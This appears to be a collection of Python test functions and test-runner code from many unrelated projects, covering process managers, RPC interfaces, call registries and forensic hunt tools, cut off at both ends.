try:\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute _setUp\r\n self.comment('%s MARBLE SETUP %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inSetUp = True\r\n resp = self.logApply(self._setUp)\r\n finally:\r\n self._inSetUp = False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n if resp == False or self.result.wasSkipped():\r\n # execute _tearDown\r\n self.comment('%s MARBLE TEARDOWN %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTearDown = True\r\n resp = self.logApply(self._tearDown)\r\n finally:\r\n self._inTearDown = False\r\n\r\n # return because setup failed\r\n return\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute possible test case's setUp\r\n if 'setUp' in dir(self):\r\n self.comment('%s TEST CASE SETUP %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTestCaseSetUp = True\r\n resp = self.logApply(self.setUp)\r\n finally:\r\n self._inTestCaseSetUp = False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n if resp == False or self.result.wasSkipped():\r\n # test case setup failed\r\n\r\n # execute _tearDown\r\n self.comment('%s MARBLE TEARDOWN %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTearDown = True\r\n resp = self.logApply(self._tearDown)\r\n finally:\r\n self._inTearDown = False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute _postTearDown\r\n try:\r\n self._inPostTearDown = True\r\n resp = self.logApply(self._postTearDown)\r\n finally:\r\n self._inPostTearDown = False\r\n\r\n # return if test execution should be 
stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute possible test case's tearDown\r\n if 'tearDown' in dir(self):\r\n self.comment('%s TEST CASE TEARDOWN %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTestCaseTearDown = True\r\n resp = self.logApply(self.tearDown)\r\n finally:\r\n self._inTestCaseTearDown = False\r\n\r\n if resp == False:\r\n self._warn('Failure during test case teardown!')\r\n\r\n # return because test case setup failed\r\n return\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute _postSetUp\r\n try:\r\n self._inPostSetUp = True\r\n resp = self.logApply(self._postSetUp)\r\n finally:\r\n self._inPostSetUp = False\r\n\r\n # return if post setup fails\r\n if resp == False:\r\n self._warn('Failure during post setup!')\r\n return\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute the test method\r\n testMethod = getattr(self, self.testMethodName)\r\n self.comment('%s TEST CASE %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTestCase = True\r\n resp = self.logApply(testMethod)\r\n finally:\r\n self._inTestCase = False\r\n\r\n ok = resp != False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute _tearDown\r\n self.comment('%s MARBLE TEARDOWN %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTearDown = True\r\n resp = self.logApply(self._tearDown)\r\n finally:\r\n self._inTearDown = False\r\n\r\n if ok: ok = resp != False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute possible test case's tearDown\r\n if 'tearDown' in dir(self):\r\n self.comment('%s TEST CASE TEARDOWN %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTestCaseTearDown = True\r\n resp = self.logApply(self.tearDown)\r\n finally:\r\n self._inTestCaseTearDown = False\r\n\r\n if resp == False:\r\n self._warn('Failure during test case teardown!')\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute _postTearDown\r\n try:\r\n self._inPostTearDown = True\r\n resp = self.logApply(self._postTearDown)\r\n finally:\r\n self._inPostTearDown = False\r\n\r\n if ok: ok = resp != False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # Success!\r\n if not self.result.getError():\r\n if ok:\r\n self.result.addSuccess(self)\r\n if core.FW_conf['delete_success_blx'] and core.FW_conf['tracing_enabled'] and not core.FW_conf['memory_leak_detection']:\r\n #Delete successfull testcase blx if user doesn't need those\r\n core.FW_conf['trace'].deleteBlx = True\r\n except SystemExit:\r\n # put self._raiseSystemExit flag to True so that SystemExit\r\n # can be raised in finally:\r\n self._raiseSystemExit = True\r\n except Exception, e:\r\n # This is usually caused by an internal error, but could also\r\n # be a KeyboardInterrupt. 
In either case, stop testing is\r\n # needed here.\r\n self.logApply(self.stop, e)\r\n finally:\r\n # raise SystemExit if needed\r\n if self._raiseSystemExit:\r\n raise\r\n\r\n for phone in core.FW_conf['connection']:\r\n if phone._createBugReport:\r\n phone.createBugReport()\r\n\r\n if core.FW_conf['settings'].TestRun.TakeHeapDumps:\r\n core.FW_conf['connection'].takeHeapDumps()\r\n\r\n self._stopTest()", "def test_log_success(self, mock_info):\n\n with utils.log_activity(\"for test\"):\n pass\n\n mock_info.assert_any_call(\"[jaxline] %s starting...\", \"for test\")\n mock_info.assert_any_call(\"[jaxline] %s finished.\", \"for test\")", "def test_runs_returned_async(self):\n from furious.async import Async\n from furious.processors import _handle_results\n\n processor = Mock()\n processor.return_value = Mock(spec=Async)\n\n _handle_results({'_process_results': processor})\n\n processor.return_value.start.assert_called_once_with()", "def test_process_info(self, mocked_get, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test first RPC call with process namespec\n self.assertEqual([{'name': 'proc'}], rpc.get_process_info('appli:proc'))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:proc')], mocked_get.call_args_list)\n # reset patches\n mocked_check.reset_mock()\n mocked_get.reset_mock()\n # test second RPC call with group namespec\n self.assertEqual([{'name': 'proc_1'}, {'name': 'proc_2'}],\n rpc.get_process_info('appli:*'))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*')], mocked_get.call_args_list)", "def pytest_runtest_makereport(item, call):\n if item.originalname == \"test_setup\" and call.when == \"call\":\n try:\n # TODO: not sure if this check is enough\n failed = not call.result == []\n except:\n # call does not have valid result attribute if some exception happended\n # during the test\n failed = True\n\n scenario = scenario_re.match(item.name).groups()[0]\n _scenario_setup_failed[scenario] = failed", "def test_start_application(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n from supvisors.ttypes import ApplicationStates\n # prepare context\n self.supervisor.supvisors.context.applications = {'appli_1': Mock()}\n # get patches\n mocked_start = self.supervisor.supvisors.starter.start_application\n mocked_progress = self.supervisor.supvisors.starter.in_progress\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with unknown strategy\n with self.assertRaises(RPCError) as exc:\n rpc.start_application('strategy', 'appli')\n self.assertEqual(Faults.BAD_STRATEGY, exc.exception.code)\n self.assertEqual('BAD_STRATEGY: strategy', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with unknown application\n with self.assertRaises(RPCError) as exc:\n rpc.start_application(0, 'appli')\n self.assertEqual(Faults.BAD_NAME, exc.exception.code)\n self.assertEqual('BAD_NAME: appli', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running application\n application = self.supervisor.supvisors.context.applications['appli_1']\n for 
appli_state in [ApplicationStates.STOPPING, ApplicationStates.RUNNING,\n ApplicationStates.STARTING]:\n application.state = appli_state\n with self.assertRaises(RPCError) as exc:\n rpc.start_application(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: appli_1', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with stopped application\n # test no wait and not done\n application.state = ApplicationStates.STOPPED\n mocked_start.return_value = False\n result = rpc.start_application(0, 'appli_1', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(0, application)], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test no wait and done\n application.state = ApplicationStates.STOPPED\n mocked_start.return_value = True\n result = rpc.start_application(0, 'appli_1', False)\n self.assertFalse(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(0, application)], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test wait and done\n mocked_start.return_value = True\n result = rpc.start_application(0, 'appli_1')\n self.assertFalse(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(0, application)], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test wait and not done\n mocked_start.return_value = False\n deferred = rpc.start_application(0, 'appli_1')\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(0, application)], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n # test returned function: return True when job in progress\n mocked_progress.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: raise exception if job not in progress anymore\n # and application not running\n mocked_progress.return_value = False\n for appli_state in [ApplicationStates.STOPPING, ApplicationStates.STOPPED,\n ApplicationStates.STARTING]:\n with self.assertRaises(RPCError) as exc:\n deferred()\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual('ABNORMAL_TERMINATION: appli_1', exc.exception.text)\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: return True if job not in progress anymore\n # and application running\n application.state = ApplicationStates.RUNNING\n self.assertTrue(deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)", "def test_get_start_true(self):\n\n tt = TemperatureTracker()\n tt.start()\n self.assertIsNotNone(tt.get_start())", "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = 
client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_get_run(self):\n pass", "def check_result(self, result):\n self.log.info(\"--check_result, result= %s\", result)\n if result[0]['exit_status'] != 0:\n self.fail(\"##Error detected from check_result\")\n else:\n self.log.info(\"--check_result passed\")", "def test_startService(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n # Schedule the process to start\r\n self.pm.startService()\r\n # advance the reactor to start the process\r\n self.reactor.advance(0)\r\n self.assertTrue(\"foo\" in self.pm.protocols)", "def test_fixture_available_results(tmp_sample_project):\n config_dir = tmp_sample_project\n output = subprocess.run([\"smif\", \"available_results\", \"energy_central\", \"-d\", config_dir],\n stdout=subprocess.PIPE)\n\n out_str = str(output.stdout)\n assert(out_str.count('model run: energy_central') == 1)\n assert(out_str.count('sos model: energy') == 1)\n assert(out_str.count('sector model:') == 1)\n assert(out_str.count('output:') == 2)\n assert(out_str.count('output: cost') == 1)\n assert(out_str.count('output: water_demand') == 1)\n assert(out_str.count('no results') == 2)\n assert(out_str.count('decision') == 0)\n\n # Run energy_central and re-check output with optional flag for completed results\n subprocess.run([\"smif\", \"run\", \"energy_central\", \"-d\", config_dir], stdout=subprocess.PIPE)\n output = subprocess.run([\"smif\", \"available_results\", \"energy_central\", \"-d\", config_dir],\n stdout=subprocess.PIPE)\n\n out_str = str(output.stdout)\n assert(out_str.count('model run: energy_central') == 1)\n assert(out_str.count('sos model: energy') == 1)\n assert(out_str.count('sector model:') == 1)\n assert(out_str.count('output:') == 2)\n assert(out_str.count('output: cost') == 1)\n assert(out_str.count('output: water_demand') == 1)\n assert(out_str.count('no results') == 0)\n assert(out_str.count('decision') == 8)\n assert(out_str.count('decision 1') == 2)\n assert(out_str.count('decision 2') == 2)\n assert(out_str.count('decision 3') == 2)\n assert(out_str.count('decision 4') == 2)\n assert(out_str.count(': 2010') == 4)\n assert(out_str.count(': 2015') == 2)\n assert(out_str.count(': 2020') == 2)", "def test_call(*args, **kwargs):\n try:\n subprocess.check_output(*args, **kwargs)\n return True\n except Exception:\n return False", "def test_get_process(self):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n self.supervisor.supvisors.context.processes = {\n 'proc_1': 'first process'}\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test with known application\n self.assertEqual('first process', rpc._get_process('proc_1'))\n # test with unknown application\n with self.assertRaises(RPCError) as exc:\n rpc._get_process('proc')\n self.assertEqual(Faults.BAD_NAME, exc.exception.code)\n self.assertEqual('BAD_NAME: process proc unknown in Supvisors',\n exc.exception.text)", "def test_startProcess(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n self.pm.startProcess(\"foo\")\r\n self.assertIsInstance(self.pm.protocols[\"foo\"], LoggingProtocol)\r\n self.assertIn(\"foo\", self.pm.timeStarted.keys())", "def process_ResultCheck(self):\n try:\n cmd = self.ExecutionTask.get_param().split(',')\n 
logging.debug(\"%s-%s-%s-%s-%s\" % ( TestScriptSymbolTable.get_value_from_sym_tab(cmd[0], TestScriptSymbolTable.test_script_sym_tab),cmd[0], cmd[1], cmd[2], cmd[3]))\n\n checkval = cmd[0].split('!') \n \n cval = TestScriptSymbolTable.get_value_from_sym_tab(checkval[1], TestScriptSymbolTable.capi_cmd_ret_sym_tab)\n\n if int(cval) >= int(cmd[1]):\n result = cmd[2]\n else:\n result = cmd[3]\n\n logging.info(\"\\nRESULT CHECK---> %15s\", result) \n self.setTestResult(result)\n \n #if result == 'FAIL':\n if 'FAIL' in result:\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n except OSError:\n logging.info(\"\\nException - ResultCheck\")", "def runTest(self):\n self.setUp()\n success = False\n message = ''\n try:\n self.command = [self.test_manager.executable_path]\n self.command.extend(self.test.spirv_args)\n\n process = subprocess.Popen(\n args=self.command,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n cwd=self.directory)\n output = process.communicate(self.stdin_shader)\n test_status = TestStatus(self.test_manager, process.returncode, output[0],\n output[1], self.directory, self.inputs,\n self.file_shaders)\n run_results = [\n getattr(self.test, test_method)(test_status)\n for test_method in get_all_test_methods(self.test.__class__)\n ]\n success, message = zip(*run_results)\n success = all(success)\n message = '\\n'.join(message)\n except Exception as e:\n success = False\n message = str(e)\n self.test_manager.notify_result(\n self, success,\n message + '\\nSTDOUT:\\n%s\\nSTDERR:\\n%s' % (output[0], output[1]))\n self.tearDown()", "def test_success_result(self):\n dr = EventualResult(succeed(123), None)\n self.assertEqual(dr.wait(0.1), 123)", "def test_stopped_already_have_result(self):\n registry = ResultRegistry()\n er = EventualResult(succeed(123), None)\n registry.register(er)\n registry.stop()\n self.assertEqual(er.wait(0.1), 123)\n self.assertEqual(er.wait(0.1), 123)\n self.assertEqual(er.wait(0.1), 123)", "def test_conflicts(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n self.supervisor.supvisors.context.processes = {\n 'proc_1': Mock(**{'conflicting.return_value': True,\n 'serial.return_value': {'name': 'proc_1'}}),\n 'proc_2': Mock(**{'conflicting.return_value': False,\n 'serial.return_value': {'name': 'proc_2'}}),\n 'proc_3': Mock(**{'conflicting.return_value': True,\n 'serial.return_value': {'name': 'proc_3'}})}\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertItemsEqual([{'name': 'proc_1'}, {'name': 'proc_3'}],\n rpc.get_conflicts())\n self.assertEqual([call()], mocked_check.call_args_list)", "def runTest(self):\n return True", "def test_isRunning_valve_pumpRunning(self):\n\t\tdef mock_def(uri, *args):\n\t\t\tif(uri == u\"ch.db.getdevicedata\"):\n\t\t\t\treturn {'name':'testValve', 'type':'valve', 'group':1, 'id':1, 'description': ''}\n\t\t\telif(uri == u\"ch.gpio.isrunning\"):\n\t\t\t\tif(args[0] == 1):\n\t\t\t\t\treturn True\n\t\t\t\telif(args[0] == 2):\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\traise ValueError(\"Given device id does not exist ({})\".format(args[0]))\n\t\t\telif(uri == u\"ch.gpio.switch\"):\n\t\t\t\treturn \"success\"\n\t\t\telif(uri == u\"ch.db.getdevicegroup\"):\n\t\t\t\treturn [{'name':'testPump', 'type':'pump', 'group':1, 'id':2, 'description': ''}]\n\t\t\telse:\n\t\t\t\traise ValueError(\"Given URI does not exist ({})\".format(uri))\n\t\tdm = DeviceManager()\n\t\tdm.sessionID = 
None\n\t\tdm.call=MagicMock(side_effect=mock_def)\n\t\tdm.publish = MagicMock()\n\t\tself.failureResultOf(dm.switchIfAllowed('testValve', None), ApplicationError)", "def test_application_info(self, mocked_serial, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertEqual({'name': 'appli'}, rpc.get_application_info('dummy'))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('dummy')], mocked_serial.call_args_list)", "def test(self):\n return self._test(result_count=1, failure_amount=1)", "def test(self):\n return self._test(result_count=1, failure_amount=1)", "def test_restart_application(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # first call to this function tells that job is still in progress\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_integration(self):\n self.assertTrue(return_true())", "def 
test_rpcCall(self):\n pass", "def test_check_operating(self):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test the call to _check_state\n with patch.object(rpc, '_check_state') as mocked_check:\n rpc._check_operating()\n self.assertListEqual([call([2])], mocked_check.call_args_list)", "def test_registry(self):\n myreactor = FakeReactor()\n c = EventLoop(lambda: myreactor, lambda f, g: None)\n c.no_setup()\n\n @c.run_in_reactor\n def run():\n return\n\n result = run()\n self.assertIn(result, c._registry._results)", "def test_use_exit_status(self): # suppress(no-self-use)\n subprocess.call.return_value = 1\n GreenTestCommand(Distribution()).run()\n sys.exit.assert_called_with(1)", "def test_1_variantcall(install_test_files, data_dir):\n with make_workdir() as workdir:\n cl = [\"bcbio_nextgen.py\",\n get_post_process_yaml(data_dir, workdir),\n os.path.join(data_dir, os.pardir, \"100326_FC6107FAAXX\"),\n os.path.join(data_dir, \"run_info-variantcall.yaml\")]\n subprocess.check_call(cl)", "def test_restart(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertTrue(rpc.restart())\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call()],\n self.supervisor.supvisors.fsm.on_restart.call_args_list)", "def checkRunning(procname):\n return procdata.checkRunning(procname)", "def testProcess(self):\n self.grr_hunt_osquery_collector.Process()\n # extract call kwargs\n call_kwargs = self.mock_grr_api.CreateHunt.call_args[1]\n self.assertEqual(call_kwargs['flow_args'].query,\n 'SELECT * FROM processes')\n self.assertEqual(call_kwargs['flow_args'].timeout_millis,\n 300000)\n self.assertEqual(call_kwargs['flow_args'].ignore_stderr_errors, False)\n self.assertEqual(call_kwargs['flow_name'], 'OsqueryFlow')\n self.assertEqual(call_kwargs['hunt_runner_args'].description,\n 'random reason')", "def test_process(self):\n xknx = XKNX(loop=self.loop)\n sensor = Sensor(\n xknx,\n 'TestSensor',\n value_type='temperature',\n group_address_state='1/2/3')\n\n telegram = Telegram(GroupAddress('1/2/3'))\n telegram.payload = DPTArray((0x06, 0xa0))\n self.loop.run_until_complete(asyncio.Task(sensor.process(telegram)))\n self.assertEqual(sensor.sensor_value.payload, DPTArray((0x06, 0xa0)))\n self.assertEqual(sensor.resolve_state(), 16.96)", "def test_service_initiated():\n assert \"ready\" in bkt_outcome_unwind.index()", "def run(self, result=None):\n\n with self.env_wrap():\n super(RelengToolTestCase, self).run(result)", "def test_make_tool_plugin_scan_calledprocesserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = subprocess.CalledProcessError(1, '', output=\"mocked error\")\n mtp = setup_make_tool_plugin()\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n package['make_targets'] = 'make_targets'\n issues = mtp.scan(package, 'level')\n assert not issues", "def testProcess(self, mock_get_write_results):\n self.mock_grr_api.Hunt.return_value.Get.return_value = \\\n mock_grr_hosts.MOCK_HUNT\n self.grr_hunt_downloader.Process()\n mock_get_write_results.assert_called_with(mock_grr_hosts.MOCK_HUNT,\n '/tmp/test')", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n 
response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def testInThread(self):\n\n self.collectSensorData()\n self.moveHome()\n self.requestGrasp()\n result = self.waitForGenerateGraspsResult()\n graspFound = self.processGenerateGraspsResult(result)\n return graspFound", "def test_start(self):\n\n message = {\"method\": \"start\",\n \"params\": {\"elem\": self.container_to_run}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"start\")\n self.assertIsInstance(response[\"result\"], list)\n\n container_name = \"/\" + self.container_to_run\n\n containers = {i[0]: i[1] for i in response[\"result\"]}\n self.assertIn(container_name, containers.keys(),\n \"Container not found\")\n\n find_up_status = containers[container_name].lower().find(\"up\")\n\n self.assertEqual(find_up_status, 0, \"Container is not running\")", "def test_search_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"search master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search master instance from previous result\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n self.ins.runtime[\"route_instance_entry_list\"] = self.ins.get_route_instance_entry(mock_device_ins)\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n match_from_previous_response=True,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with brief and not interested counter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_BRIEF\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=1,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with detail\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_DETAIL\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=18,\n instance_rib_irib_holddown_count=0,\n )\n self.assertTrue(response)\n\n print(\"search instance info but entry don't have related parameter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=22,\n instance_rib_irib_holddown_count=0,\n )\n self.assertFalse(response)\n\n 
print(\"search instance info with extensive\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=0,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 16)", "def pytest_runtest_call(self, item):\n if not item.config.option.tc_duration:\n self.detailed_duration[item.nodeid]['call'] = time.time()\n\n if self._buildname is None:\n self.buildname(item.config.env.env_prop)\n if self._buildname is not None and not self._init_session:\n self._sessionstart(item)\n self._init_session = True\n self._send_post_request(item)", "def startTestHook(self):", "def run_starter(self, expect_to_fail=False):", "def test(self):\n \"\"\"WARNING: IT IS HIGHLY RECOMMENDED TO HAVE ONE TEST ONLY TO ISOLATE FUNCTIONAL TESTS FROM EACH OTHER. i.e. \n Start a new Python Interpreter and JVM for each test. In the end, it means only one test in this class. \"\"\"\n \n logger.info('**Starting test**')\n q = Queue()\n\n p = Process(target=self.client_process1, args=(q,))\n p.start()\n result = q.get()\n p.join()\n self.assertEqual(result, \"OK\") \n logger.debug(\"Restarting dataClay\")\n self.mock.mock.restartDataClay()\n p = Process(target=self.client_process2, args=(q,))\n p.start()\n result = q.get()\n p.join()\n self.assertEqual(result, \"OK\") \n\n logger.info(\"** Test OK!\")", "def runtest(self):", "def test_defaults_to_process_results(self, processor_mock):\n from furious.processors import _handle_results\n\n _handle_results({})\n\n processor_mock.assert_called_once_with()", "def test_run_process(self):\n workflow = self.get_workflow(\n \"\"\"file://result <- file://source\n echo result > result\n \"\"\")\n process = workflow._processes[0]\n create_tuttle_dirs()\n workflow.run_process(process)\n assert path.isfile(\"result\")", "def test_result(self):\n result = compute()\n self.assertEqual(result, '4782')\n print(\"eulpy25Test passed\")", "def test_asdf_from_call():\n config_file = t_path(\n Path('steps') / 'jwst_generic_pars-makeliststep_0001.asdf'\n )\n results = MakeListStep.call(config_file=config_file)\n\n assert results == DEFAULT_RESULT", "def test_start_scan(self):\n pass", "def test_startProcessAlreadyStarted(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n self.pm.startProcess(\"foo\")\r\n self.assertIdentical(None, self.pm.startProcess(\"foo\"))", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def v2_runner_on_ok(self, result, **kwargs):\n host = result._host\n print(json.dumps({host.name: result._result}, indent=4))", "def cb_test( self, ):\r\n # this shows how to run stuff in the helper -- call thru queue, post to queue\r\n self.post_to_queue( \"call\", 